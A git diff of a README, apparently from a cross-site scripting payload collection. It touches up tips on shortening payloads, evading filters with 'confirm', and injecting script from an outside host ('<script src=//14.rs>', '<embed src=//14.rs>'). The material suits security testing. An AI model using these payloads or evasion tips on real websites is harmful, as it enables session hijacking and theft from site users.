diff --git a/README.md b/README.md index f57e44f..bba5c51 100644 --- a/README.md +++ b/README.md @@ -66,9 +66,9 @@ Come back later ### Awesome Tips & Tricks - http:// can be shortened to // - **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. -- alert and other function don't need a value, so stop doing **alert(1)** and start doing **alert()** -- I have found that **confirm** is the least detected pop-up function so stop using alert. -- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"glt;** +- alert and other pop-up functions don't need a value, so stop doing **alert(1)** and start doing **alert()** +- I have found that **confirm** is the least detected pop-up function so stop using **alert**. +- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"&glt;** - The shortest independent payload is **<embed src=//14.rs>** (19 chars) ## Credits and all that